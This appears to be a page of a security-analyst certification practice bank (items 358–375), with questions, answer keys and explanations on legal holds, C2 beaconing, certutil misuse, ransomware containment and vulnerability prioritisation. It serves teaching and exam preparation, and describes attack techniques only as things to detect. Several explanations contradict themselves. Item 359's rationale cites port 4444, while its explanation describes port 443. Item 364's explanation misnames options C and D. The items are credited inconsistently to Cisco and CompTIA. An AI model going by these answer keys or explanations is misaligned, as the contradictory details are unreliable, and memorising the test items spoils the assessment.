A legal hold is issued during an investigation. Which actions support it? (Choose two.)

Select 2 answers
A.Preserve relevant logs, mailboxes, images, and tickets
B.Let each team decide informally what to delete
C.Purge audit logs to save storage
D.Suspend routine deletion for in-scope evidence
AnswersA, D

Potential evidence must be retained.

Why this answer

A legal hold (litigation hold) requires preservation of all potentially relevant electronically stored information (ESI). Preserving logs, mailboxes, images, and tickets ensures that data is not altered or deleted, maintaining its integrity for forensic analysis and legal proceedings. This action directly supports the hold by preventing spoliation and ensuring compliance with discovery obligations.

Exam trap

Cisco often tests the misconception that cost-saving measures (like purging logs) are acceptable during a legal hold, when in fact any deletion—even for legitimate storage management—violates the preservation requirement and can be considered spoliation.

358
MCQmedium

A server team needs to fix an OpenSSL vulnerability across Linux hosts. What should the technical remediation section include? If the primary audience is technical remediation owner, which content choice is most appropriate?

A.Only a red/yellow/green chart
B.Only the CVE headline
C.Affected assets, package versions, patch commands or vendor guidance, validation method, and rollback notes
D.Only estimated financial loss
AnswerC

Technical teams need precise, actionable remediation steps and a way to confirm success. The report should be tuned to technical remediation owner while preserving factual accuracy.

Why this answer

Option C is correct because a technical remediation section must provide actionable steps for the remediation owner. This includes identifying affected assets and package versions, specifying patch commands or vendor guidance, outlining a validation method to confirm the fix, and including rollback notes in case the patch causes issues. Without these details, the remediation owner cannot execute the fix reliably or verify its success.

Exam trap

Cisco often tests the distinction between reporting to executives (which uses summary charts) and providing technical remediation details to the remediation owner, leading candidates to mistakenly choose a high-level summary like a chart or CVE headline instead of the actionable, step-by-step content required for the technical audience.

How to eliminate wrong answers

Option A is wrong because a red/yellow/green chart is a status summary for executive reporting, not a technical remediation plan; it lacks the specific commands, versions, and validation steps needed to fix an OpenSSL vulnerability. Option B is wrong because only the CVE headline (e.g., CVE-2024-XXXX) provides no actionable information; the remediation owner needs affected package versions, patch commands, and rollback procedures, not just a vulnerability identifier.

359
MCQmedium

Refer to the exhibit. An analyst sees this output from a workstation. Which of the following is the most likely explanation?

A.The workstation is receiving NTP time synchronization
B.The workstation is performing a port scan
C.The workstation is a web server
D.The workstation is infected with malware connecting to a C2 server
AnswerD

Multiple connections to the same IP on port 4444 is suspicious.

Why this answer

The output shows repeated outbound TCP connections to a single external IP address on port 443 (HTTPS) with varying source ports, which is characteristic of beaconing behavior. Malware often establishes periodic connections to a command-and-control (C2) server to receive instructions or exfiltrate data, and the pattern of multiple connections from different ephemeral ports to the same destination is a common indicator of such activity.

Exam trap

The trap here is that candidates see HTTPS (port 443) and assume legitimate web server or normal browsing, missing the key indicator of repeated outbound connections to a single external IP, which is a hallmark of C2 beaconing rather than typical client-server communication.

How to eliminate wrong answers

Option A is wrong because NTP time synchronization uses UDP port 123, not TCP port 443, and the output shows TCP connections, not NTP packets. Option B is wrong because a port scan typically involves connections to multiple destination ports on a target, not repeated connections to a single destination port from varying source ports. Option C is wrong because a web server listens on TCP port 80 or 443 for inbound connections, whereas this output shows outbound connections from the workstation to an external IP, indicating client-side behavior.

360
Multi-Selecthard

A security analyst is prioritizing vulnerabilities for remediation. The analyst has the following information: a vulnerability with a CVSS score of 9.0 that affects a public-facing web server, and a vulnerability with a CVSS score of 7.5 that affects an internal database server with sensitive data. Which two factors should the analyst consider when prioritizing? (Choose two.)

Select 2 answers
A.The presence of known exploits in the wild.
B.The vendor's patch release date.
C.The asset's exposure and criticality.
D.The number of open ports on each server.
E.The vulnerability publication date.
AnswersA, C

Active exploits increase urgency.

Why this answer

Option A is correct because the presence of known exploits in the wild directly impacts the likelihood of a vulnerability being weaponized. Even a high CVSS score (e.g., 9.0) may be less urgent if no exploit exists, while a lower-scored vulnerability (e.g., 7.5) with active exploitation poses an immediate threat. This aligns with the CVSS environmental metrics and threat intelligence integration in vulnerability management.

Exam trap

Cisco often tests the misconception that CVSS score alone determines priority, whereas the correct approach combines CVSS with threat intelligence (exploit availability) and asset criticality/exposure.

361
MCQmedium

During a security incident, the SOC analyst determines that the attack is originating from an internal IP address belonging to the finance department. The incident response plan requires escalation to the appropriate team. Which of the following should the analyst contact first?

A.The legal department to handle potential compliance issues.
B.The system administrator for the finance department to isolate the host.
C.The finance department manager to confirm if the activity is authorized.
D.The human resources department for disciplinary action.
AnswerC

Verifying with the department manager confirms if the activity is legitimate before further action.

Why this answer

Option C is correct because the incident response plan requires confirmation of authorization before taking containment actions. Since the activity originates from an internal IP in the finance department, the analyst must first contact the finance department manager to verify whether the traffic is legitimate business use (e.g., a scheduled audit or approved data transfer). This step prevents unnecessary disruption and aligns with the 'verify before act' principle in NIST SP 800-61 incident handling.

Exam trap

CompTIA often tests the misconception that technical containment (e.g., isolating a host) should be the immediate next step, but the correct sequence requires verifying authorization first to avoid disrupting legitimate business operations.

How to eliminate wrong answers

Option A is wrong because legal department involvement is premature at this stage; compliance issues are only considered after unauthorized activity is confirmed, not before verifying authorization. Option B is wrong because isolating the host without first confirming the activity is authorized could disrupt legitimate business operations and violates the containment-first-verify principle; system administrators are contacted after authorization is denied. Option D is wrong because HR disciplinary action is a post-incident response step, only relevant after unauthorized activity is confirmed and attributed to an individual, not during initial triage.

362
MCQmedium

A host alert shows certutil.exe downloading a file from an external URL, followed by execution from a user-writable directory. What should the analyst focus on? In the root-cause analysis phase, Which finding would most directly explain the activity?

A.Reinstall the browser used by the user
B.Living-off-the-land binary misuse and the downloaded file's hash, origin, and child process
C.Ignore it because certutil is signed by Microsoft
D.Only check whether antivirus signatures are current
AnswerB

Certutil can be abused to download payloads; file and process context establishes whether execution is malicious.

Why this answer

Option B is correct because certutil.exe is a known living-off-the-land binary (LOLBin) that attackers abuse to download payloads from external URLs, bypassing application whitelisting. The root-cause analysis must focus on the downloaded file's hash (to identify malware), its origin (the external URL), and any child processes spawned (to trace execution chain), as these directly explain the malicious activity.

Exam trap

Cisco often tests the misconception that signed Microsoft binaries are inherently safe, tricking candidates into ignoring LOLBin abuse, when the real focus should be on the downloaded file's hash, origin, and execution chain.

How to eliminate wrong answers

Option A is wrong because reinstalling the browser does not address the root cause; the attack used certutil.exe, not the browser, so the browser is irrelevant to the download or execution. Option C is wrong because ignoring the alert due to certutil being signed by Microsoft is a dangerous misconception; attackers exploit legitimate signed binaries (LOLBins) to evade detection, and the activity is clearly anomalous and requires investigation.

363
Multi-Selectmedium

Which items belong in a vulnerability exception request? (Choose three.)

Select 3 answers
A.Business justification for delayed remediation
B.A request to remove the asset from inventory
C.Expiration or review date
D.Compensating controls
AnswersA, C, D

Justification explains why normal remediation cannot occur.

Why this answer

A vulnerability exception request is a formal process to accept the risk of not remediating a vulnerability within the standard timeframe. A business justification for delayed remediation is a core component because it documents the operational, financial, or technical reasons why the fix cannot be applied immediately, which is required for risk acceptance by management. Without this justification, the exception lacks the necessary context for approval and audit compliance.

Exam trap

Cisco often tests the distinction between operational risk acceptance (exception request) and asset lifecycle management (decommissioning), leading candidates to incorrectly include asset removal as part of the exception process.

364
MCQeasy

A security analyst reviews the above bucket policy. Which of the following BEST describes the risk associated with this policy?

A.The bucket is publicly readable, potentially exposing sensitive data
B.The bucket allows anyone to upload malicious files
C.The bucket enforces encryption in transit
D.The bucket requires authentication for access
AnswerA

Principal: * allows unauthenticated access.

Why this answer

Option A is correct because the policy allows any anonymous user to read objects. Option B is wrong because it's a GET, not PUT. C is wrong because the policy does not require authentication.

D is wrong because encryption is not addressed.

365
MCQmedium

A UEBA rule flags a user authenticating from London and Singapore within 12 minutes, followed by a mailbox forwarding rule creation. What should the analyst investigate first? In the containment trade-off phase, Which response balances containment with evidence preservation?

A.Sign-in logs, MFA result, device details, and mailbox audit events
B.The organisation's public DNS zone file
C.Only the user's browser cache
D.Only DHCP logs from the London office
AnswerA

Impossible travel plus forwarding rule creation is a strong account-compromise pattern; identity and mailbox audit data confirm whether the activity is malicious.

Why this answer

Option A is correct because the UEBA rule indicates a possible account compromise (impossible travel followed by mailbox rule creation). The analyst must first verify the sign-in logs for authentication source IPs, MFA result to check if the attacker bypassed MFA, device details to identify if a known device was used, and mailbox audit events to confirm the forwarding rule. These four data sources provide the minimum evidence needed to assess the scope of compromise before containment.

Exam trap

Cisco often tests the candidate's ability to prioritize server-side logs (sign-in, MFA, audit) over client-side artifacts (browser cache) or unrelated infrastructure (DNS zone file) when investigating a UEBA alert for account compromise.

How to eliminate wrong answers

Option B is wrong because the organisation's public DNS zone file is irrelevant to a user-level authentication and mailbox rule anomaly; DNS records do not contain user sign-in or mailbox audit data. Option C is wrong because the user's browser cache is a client-side artifact that may be overwritten or inaccessible, and it does not provide server-side evidence of authentication events or mailbox rule creation, which are critical for forensic analysis.

366
MCQhard

A container workload unexpectedly starts a shell, mounts the host filesystem, and attempts outbound connections to an unknown IP. Which telemetry is MOST useful? In the detection engineering phase, Which detection or tuning approach would reduce noise without losing the signal?

A.Only physical datacenter access logs
B.Only user password age reports
C.Container runtime events, Kubernetes audit logs, and network flow from the pod
D.Only monthly vulnerability scan summaries
AnswerC

Runtime, orchestration, and network telemetry together show process execution, privilege context, and external communication.

Why this answer

Container runtime events (e.g., from containerd or CRI-O) capture process spawns like a shell inside the container, Kubernetes audit logs record API calls that mount host paths (e.g., `hostPath` volumes), and network flow logs (e.g., from CNI plugins or eBPF) show outbound connections to unknown IPs. Together, these three telemetry sources provide the full kill chain—execution, privilege escalation, and exfiltration—making option C the most useful for detection engineering.

Exam trap

Cisco often tests the misconception that host-level logs (like datacenter access or password reports) are sufficient for container security, when in fact container-specific telemetry is required to detect runtime anomalies like shell execution and unauthorized mounts.

How to eliminate wrong answers

Option A is wrong because physical datacenter access logs track who entered the facility, not container-level activities like shell execution or network flows; they are irrelevant to a workload compromise. Option B is wrong because user password age reports indicate password policy compliance, not real-time runtime behavior; they cannot detect a shell spawning or outbound connections from a container.

367
MCQmedium

A legacy system cannot be patched because the vendor no longer supports the application. What should the vulnerability manager request? For validation, Which action should be taken before closing or downgrading the finding?

A.Give all users local admin rights
B.Mark the vulnerability as fixed
C.Documented risk acceptance with compensating controls and a migration/remediation plan
D.Remove the system from future reports
AnswerC

Unsupported systems need formal exception handling, mitigation, ownership, and an exit path.

Why this answer

When a legacy system cannot be patched due to vendor end-of-life, the vulnerability manager must formally accept the risk by documenting the risk acceptance, implementing compensating controls (e.g., network segmentation, host-based firewall rules, or application whitelisting), and creating a migration or remediation plan to eventually retire or replace the system. This aligns with the NIST SP 800-53 risk management framework and ensures auditability.

Exam trap

Cisco often tests the misconception that 'no patch available' means the vulnerability can be closed as 'fixed' or that compensating controls alone are sufficient without formal documentation and a plan.

How to eliminate wrong answers

Option A is wrong because granting all users local admin rights would increase the attack surface and privilege escalation risk, directly violating the principle of least privilege and potentially making the system more vulnerable. Option B is wrong because marking the vulnerability as fixed when no patch has been applied is a false positive closure; vulnerabilities must be remediated, mitigated, or formally accepted, not simply closed without evidence.

368
Multi-Selectmedium

A SOC wants to reduce alert fatigue without missing confirmed malicious activity. Which actions are appropriate? (Choose two.)

Select 2 answers
A.Suppress alerts only with documented criteria and expiry
B.Delete noisy detections permanently without review
C.Route every alert directly to executives
D.Add enrichment such as asset criticality and threat-intel context
AnswersA, D

Time-bound suppression preserves governance.

Why this answer

Option A is correct because suppressing alerts based on documented criteria (e.g., known false-positive signatures, scheduled maintenance windows) with an expiry date ensures that the suppression is temporary and reviewed periodically. This reduces alert fatigue while maintaining visibility into potential threats, as expired suppressions automatically re-enable alerting. Without an expiry, a suppression could inadvertently hide malicious activity that later matches the same criteria.

Exam trap

Cisco often tests the misconception that permanently deleting noisy detections is acceptable, but the trap is that this violates the principle of defense in depth by removing the ability to detect future variations of the same threat.

369
MCQmedium

A network sensor must detect exploit traffic using packet payload signatures and generate alerts without blocking traffic. Which deployment is BEST? In the alert triage phase, Which action gives the analyst the clearest next triage step?

A.Suricata or Snort in IDS mode on a monitored network tap or SPAN port
B.A vulnerability scanner run once per quarter
C.Host-based file integrity monitoring only
D.Inline IPS mode with drop rules for all signatures
AnswerA

IDS mode observes traffic and alerts on signatures while avoiding inline blocking impact.

Why this answer

Suricata or Snort in IDS mode on a monitored network tap or SPAN port is correct because it passively inspects packet payloads against signatures without affecting traffic flow, meeting the requirement to detect exploit traffic and generate alerts without blocking. IDS mode ensures no inline packet drops, while a tap or SPAN port provides full packet visibility for signature matching.

Exam trap

Cisco often tests the distinction between IDS and IPS modes, where candidates mistakenly choose inline IPS (Option D) because they think blocking is required for security, but the question explicitly states 'without blocking traffic,' making passive IDS the correct choice.

How to eliminate wrong answers

Option B is wrong because a vulnerability scanner run once per quarter is a proactive assessment tool that does not provide real-time packet payload inspection or alert generation for exploit traffic. Option C is wrong because host-based file integrity monitoring only detects changes to files on a host, not network-based exploit traffic in packet payloads. Option D is wrong because inline IPS mode with drop rules for all signatures actively blocks traffic, which violates the requirement to generate alerts without blocking traffic.

370
MCQmedium

A cloud posture scan finds a storage bucket with public read access containing customer exports. What should the team do first? For business prioritization, Which recommendation gives the best risk-based order of work?

A.Delete all audit logs to reduce liability
B.Wait for the next quarterly review
C.Restrict public access and determine whether sensitive data was accessed
D.Rotate database administrator passwords only
AnswerC

The priority is exposure containment and impact assessment.

Why this answer

Option C is correct because the immediate priority is to contain the data exposure by restricting public access to the storage bucket, then investigate whether sensitive data was actually accessed by unauthorized parties. This aligns with the vulnerability management principle of 'contain first, investigate second' and addresses the risk of data exfiltration without waiting for a scheduled review or performing unrelated actions.

Exam trap

The trap here is that candidates may choose to rotate passwords (Option D) as a generic security response, but the question specifically tests the ability to prioritize containment of the exposed resource over unrelated credential changes.

How to eliminate wrong answers

Option A is wrong because deleting audit logs destroys forensic evidence needed to determine the scope of the breach and violates compliance requirements (e.g., GDPR, PCI DSS) that mandate retention of logs for incident investigation. Option B is wrong because waiting for the next quarterly review leaves the bucket publicly accessible, allowing continued unauthorized access and potential data exfiltration, which is unacceptable for a critical finding. Option D is wrong because rotating database administrator passwords does not address the storage bucket's public read access; it is an unrelated control that does not mitigate the immediate exposure of customer exports.

371
MCQmedium

A host alert shows certutil.exe downloading a file from an external URL, followed by execution from a user-writable directory. What should the analyst focus on? In the containment trade-off phase, Which response balances containment with evidence preservation?

A.Ignore it because certutil is signed by Microsoft
B.Reinstall the browser used by the user
C.Living-off-the-land binary misuse and the downloaded file's hash, origin, and child process
D.Only check whether antivirus signatures are current
AnswerC

Certutil can be abused to download payloads; file and process context establishes whether execution is malicious.

Why this answer

Option C is correct because certutil.exe is a known living-off-the-land binary (LOLB) that attackers abuse to download payloads, bypassing application whitelisting. The analyst must focus on the downloaded file's hash (for threat intelligence), its origin URL (to assess the C2 infrastructure), and any child processes spawned (to trace the execution chain). In the containment trade-off phase, preserving these artifacts is critical for forensic analysis while isolating the host.

Exam trap

Cisco often tests the misconception that signed Microsoft binaries are inherently safe, but the trap here is that certutil.exe is a dual-use tool—legitimate for administrators but weaponized by attackers for LOLB attacks.

How to eliminate wrong answers

Option A is wrong because certutil being signed by Microsoft does not make it safe; attackers abuse its legitimate functionality (e.g., -urlcache -split -f) to download malicious files, a classic LOLB technique. Option B is wrong because reinstalling the browser does not address the root cause—the misuse of a system binary—and destroys evidence of the download and execution chain. Option D is wrong because antivirus signatures are reactive and may miss fileless or obfuscated payloads; the analyst must investigate the downloaded file's hash and behavior, not just signature currency.

372
MCQmedium

An analyst has several malware samples from the same campaign and wants to detect related files based on unique strings and byte patterns. Which method is MOST appropriate? In the alert triage phase, Which action gives the analyst the clearest next triage step?

A.Tune DHCP lease duration
B.Use only a firewall deny rule for port 443
C.Create and test a YARA rule against known-good and known-bad samples
D.Create a CVE entry
AnswerC

YARA rules are suitable for identifying malware families using file strings, byte sequences, and conditions.

Why this answer

YARA rules are specifically designed to identify and classify malware samples based on textual or binary patterns, including unique strings and byte sequences. By testing a YARA rule against known-good and known-bad samples, the analyst can validate its accuracy and ensure it reliably detects related files from the same campaign while minimizing false positives.

Exam trap

Cisco often tests the distinction between detection methods (YARA) and network-level controls (DHCP, firewall) or vulnerability management (CVE), leading candidates to choose a familiar but irrelevant option like a firewall rule.

How to eliminate wrong answers

Option A is wrong because tuning DHCP lease duration affects network address assignment and renewal timing, not malware detection or file analysis. Option B is wrong because using only a firewall deny rule for port 443 would block HTTPS traffic but does not help identify or correlate malware samples based on strings or byte patterns. Option D is wrong because creating a CVE entry is a formal process for documenting a vulnerability, not a method for detecting related malware files based on unique strings or byte patterns.

373
MCQmedium

During a ransomware attack, several workstations have been encrypted. The incident response team has identified the ransomware variant and determined it does not have a known decryption tool. Which containment strategy is MOST appropriate?

A.Disconnect the affected workstations from the network, but leave them powered on.
B.Power off all affected workstations immediately.
C.Run a full antivirus scan on the affected workstations.
D.Restore all affected workstations from backups immediately.
AnswerA

Disconnecting from network stops lateral movement while preserving evidence.

Why this answer

Disconnecting the affected workstations from the network (but leaving them powered on) preserves volatile evidence in memory (e.g., encryption keys, process artifacts) and prevents the ransomware from spreading to other hosts via SMB, RDP, or other lateral movement protocols. Powering off would destroy this critical forensic data, while leaving them connected risks further encryption of network shares.

Exam trap

CompTIA often tests the misconception that immediate power-off is best for safety, but the trap here is that preserving volatile memory for forensic analysis is prioritized over a simple shutdown, especially when no decryption tool exists and evidence may lead to key recovery.

How to eliminate wrong answers

Option B is wrong because immediately powering off workstations destroys volatile memory (RAM) that may contain the ransomware's encryption keys, process handles, or network connections, hindering forensic analysis and potential decryption. Option C is wrong because running a full antivirus scan on already-encrypted files is ineffective—the ransomware binary may be removed, but encrypted files remain unrecoverable without a decryption tool, and scanning consumes time that could allow further spread. Option D is wrong because restoring from backups before containing the threat risks re-infection if the ransomware is still active on the network or if backups are also encrypted; containment must precede recovery.

374
MCQmedium

After a high-priority SOC escalation, after containing a compromised host, analysis shows persistence through a scheduled task and a stolen service account. What is required before recovery? During containment, which decision is most defensible? which response best matches incident-response practice?

A.Reconnect the host because users need it
B.Disable logging to improve performance
C.Close the incident after isolation
D.Remove persistence, rotate affected credentials, and verify no related hosts remain compromised
AnswerD

Recovery should follow eradication of persistence and credential exposure. In containment, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option D is correct because after containment, the incident response process requires removing the persistence mechanism (the scheduled task), rotating the stolen service account credentials to prevent re-authentication, and verifying that no other hosts are compromised (lateral movement check). This aligns with the NIST SP 800-61 recovery phase, which mandates eradication before recovery to ensure the threat is fully removed.

Exam trap

CompTIA often tests the misconception that isolation alone is sufficient to close an incident, but the trap here is that persistence and credential theft require active eradication and verification steps before recovery can begin.

How to eliminate wrong answers

Option A is wrong because reconnecting a compromised host without eradication risks re-infection or lateral movement, violating containment principles. Option B is wrong because disabling logging during an incident destroys forensic evidence and violates chain-of-custody requirements; logging is critical for post-incident analysis. Option C is wrong because closing the incident after isolation without eradication and verification leaves persistence mechanisms and stolen credentials active, allowing the attacker to regain access.

375
MCQmedium

In a regulated payment environment, a malware alert affects a single kiosk with no sensitive access. A second alert shows the same malware on a domain admin workstation. What should drive severity? During recovery, which decision is most defensible? which action best reduces risk without losing evidence?

A.Whether the alert arrived first
B.Business impact, privilege level, asset criticality, and spread potential
C.Alphabetical order of hostnames
D.The analyst's preferred dashboard theme
AnswerB

Severity should reflect impact and risk, not only malware family name. In recovery, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option B is correct because severity in incident response must be driven by business impact, privilege level, asset criticality, and spread potential. The domain admin workstation has elevated privileges and access to sensitive systems, making it a higher priority than a non-sensitive kiosk, regardless of alert order. This aligns with NIST SP 800-61 and common IR frameworks that prioritize containment based on risk, not chronology.

Exam trap

Cisco often tests the misconception that alert chronology or simple asset labels determine severity, when in fact the correct approach is a risk-based assessment incorporating business impact, privilege, criticality, and spread potential.

How to eliminate wrong answers

Option A is wrong because alert arrival time is irrelevant to severity; a later alert on a critical asset should supersede an earlier alert on a low-value asset. Option C is wrong because alphabetical order of hostnames has no bearing on risk or incident response priority. Option D is wrong because an analyst's preferred dashboard theme is a cosmetic preference and does not influence severity decisions.

Page 4

Page 5 of 7

Page 6

All pages